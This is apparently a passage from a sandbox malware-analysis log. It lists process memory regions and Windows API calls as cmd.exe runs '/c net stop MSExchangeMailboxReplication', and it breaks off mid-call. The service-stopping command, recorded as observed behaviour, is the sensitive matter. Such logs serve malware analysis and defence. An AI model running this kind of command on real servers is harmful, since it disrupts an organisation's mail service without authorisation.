0x7e590000 end_va = 0x7e5b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e590000" filename = "" Region: id = 10887 start_va = 0x7e5b3000 end_va = 0x7e5b3fff entry_point = 0x0 region_type = private name = "private_0x000000007e5b3000" filename = "" Region: id = 10888 start_va = 0x7e5bc000 end_va = 0x7e5befff entry_point = 0x0 region_type = private name = "private_0x000000007e5bc000" filename = "" Region: id = 10889 start_va = 0x7e5bf000 end_va = 0x7e5bffff entry_point = 0x0 region_type = private name = "private_0x000000007e5bf000" filename = "" Region: id = 10890 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10891 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10892 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10893 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10894 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10895 start_va = 0x45e0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 10896 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10897 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10898 start_va = 0x46f0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 10899 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10940 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 10941 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 10942 start_va = 0x4410000 end_va = 0x44cdfff entry_point = 0x4410000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10943 start_va = 0x44d0000 end_va = 0x45cffff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 10944 start_va = 0x48f0000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 10945 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10946 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10947 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10948 start_va = 0x7e490000 end_va = 0x7e58ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e490000" filename = "" Region: id = 10949 start_va = 0x7e5b9000 end_va = 0x7e5bbfff entry_point = 0x0 region_type = private name = "private_0x000000007e5b9000" filename = "" Region: id = 10950 start_va = 0x160000 end_va = 0x163fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 10951 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10952 start_va = 0x4900000 end_va = 0x4c36fff entry_point = 0x4900000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 668 os_tid = 0xf78 [0137.932] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0137.932] __set_app_type (_Type=0x1) [0137.932] __p__fmode () returned 0x77ac4d6c [0137.932] __p__commode () returned 0x77ac5b1c [0137.932] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0137.932] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0137.932] GetCurrentThreadId () returned 0xf78 [0137.932] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf78) returned 0x84 [0137.932] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.932] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0137.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.934] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2dfc1c | out: phkResult=0x2dfc1c*=0x0) returned 0x2 [0137.935] VirtualQuery (in: lpAddress=0x2dfc23, lpBuffer=0x2dfbd4, dwLength=0x1c | out: lpBuffer=0x2dfbd4*(BaseAddress=0x2df000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.935] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x2dfbd4, dwLength=0x1c | out: lpBuffer=0x2dfbd4*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0137.935] VirtualQuery (in: lpAddress=0x1e1000, lpBuffer=0x2dfbd4, dwLength=0x1c | out: lpBuffer=0x2dfbd4*(BaseAddress=0x1e1000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0137.935] VirtualQuery (in: lpAddress=0x1e3000, lpBuffer=0x2dfbd4, dwLength=0x1c | out: lpBuffer=0x2dfbd4*(BaseAddress=0x1e3000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.935] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x2dfbd4, dwLength=0x1c | out: lpBuffer=0x2dfbd4*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0137.935] GetConsoleOutputCP () returned 0x1b5 [0137.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.935] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0137.935] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.935] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0137.935] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.935] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.936] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.936] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.936] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.936] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.936] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.936] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0137.936] GetEnvironmentStringsW () returned 0x46f7d90* [0137.936] FreeEnvironmentStringsA (penv="A") returned 1 [0137.936] GetEnvironmentStringsW () returned 0x46f7d90* [0137.936] FreeEnvironmentStringsA (penv="A") returned 1 [0137.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2deb80 | out: phkResult=0x2deb80*=0x94) returned 0x0 [0137.936] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0xc8, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.936] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x1, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0x1, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x0, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x40, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x40, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0x40, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.937] RegCloseKey (hKey=0x94) returned 0x0 [0137.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2deb80 | out: phkResult=0x2deb80*=0x94) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0x40, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x1, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0x1, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x0, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x9, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x4, lpData=0x2deb8c*=0x9, lpcbData=0x2deb88*=0x4) returned 0x0 [0137.937] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2deb84, lpData=0x2deb8c, lpcbData=0x2deb88*=0x1000 | out: lpType=0x2deb84*=0x0, lpData=0x2deb8c*=0x9, lpcbData=0x2deb88*=0x1000) returned 0x2 [0137.937] RegCloseKey (hKey=0x94) returned 0x0 [0137.937] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983a [0137.937] srand (_Seed=0x5ad2983a) [0137.937] GetCommandLineW () returned="/c net stop MSExchangeMailboxReplication" [0137.937] GetCommandLineW () returned="/c net stop MSExchangeMailboxReplication" [0137.937] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46f9ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0137.937] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.937] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.937] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.937] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0137.937] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0137.937] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0137.937] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0137.937] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0137.937] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0137.937] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0137.937] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0137.938] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0137.938] GetEnvironmentStringsW () returned 0x46f7d90* [0137.938] FreeEnvironmentStringsA (penv="A") returned 1 [0137.938] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.938] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.938] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0137.938] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0137.938] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0137.938] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0137.938] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0137.938] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0137.938] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0137.938] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0137.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2df958 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.938] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x2df958, lpFilePart=0x2df950 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x2df950*="Desktop") returned 0x1d [0137.938] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.938] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2df6d8 | out: lpFindFileData=0x2df6d8) returned 0x46f05c8 [0137.938] FindClose (in: hFindFile=0x46f05c8 | out: hFindFile=0x46f05c8) returned 1 [0137.938] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x2df6d8 | out: lpFindFileData=0x2df6d8) returned 0x46f05c8 [0137.939] FindClose (in: hFindFile=0x46f05c8 | out: hFindFile=0x46f05c8) returned 1 [0137.939] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0137.939] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x2df6d8 | out: lpFindFileData=0x2df6d8) returned 0x46f05c8 [0137.939] FindClose (in: hFindFile=0x46f05c8 | out: hFindFile=0x46f05c8) returned 1 [0137.939] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.939] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0137.939] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0137.939] GetEnvironmentStringsW () returned 0x46f7d90* [0137.939] FreeEnvironmentStringsA (penv="=") returned 1 [0137.939] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.939] GetConsoleOutputCP () returned 0x1b5 [0137.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.940] GetUserDefaultLCID () returned 0x409 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2dfa88, cchData=128 | out: lpLCData="0") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2dfa88, cchData=128 | out: lpLCData="0") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2dfa88, cchData=128 | out: lpLCData="1") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0137.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0137.940] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0137.941] GetConsoleTitleW (in: lpConsoleTitle=0x46faa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.941] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.941] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0137.941] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0137.941] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0137.942] _wcsicmp (_String1="net", _String2=")") returned 69 [0137.942] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0137.942] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0137.942] _wcsicmp (_String1="IF", _String2="net") returned -5 [0137.942] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0137.942] _wcsicmp (_String1="REM", _String2="net") returned 4 [0137.942] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0137.943] GetConsoleTitleW (in: lpConsoleTitle=0x2df770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.943] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.943] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.943] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.943] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.943] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.943] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.943] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.943] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.943] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.943] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0137.943] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.943] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.943] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.943] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.943] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.943] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.943] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.943] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.943] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.943] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.943] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.943] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.943] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.943] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.943] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.943] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.943] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.943] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.943] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.943] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.943] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.943] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.943] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.943] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.943] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.943] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.943] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.943] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.944] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.944] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.944] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.944] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.944] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.944] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.944] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.944] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.944] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.944] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0137.944] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.944] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.944] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.944] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.944] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.944] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.944] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.944] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.944] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.944] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.944] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.944] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.944] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.944] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.944] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.944] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.944] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.944] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.944] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.944] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.944] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.944] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.944] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.944] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.944] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.944] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.944] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.944] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.944] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.944] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.944] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0137.944] _wcsicmp (_String1="net", _String2="IF") returned 5 [0137.944] _wcsicmp (_String1="net", _String2="REM") returned -4 [0137.945] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0137.945] SetErrorMode (uMode=0x0) returned 0x0 [0137.945] SetErrorMode (uMode=0x1) returned 0x0 [0137.945] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46f05d0, lpFilePart=0x2df27c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x2df27c*="Desktop") returned 0x1d [0137.945] SetErrorMode (uMode=0x0) returned 0x1 [0137.945] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.945] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.953] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.953] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.953] GetConsoleTitleW (in: 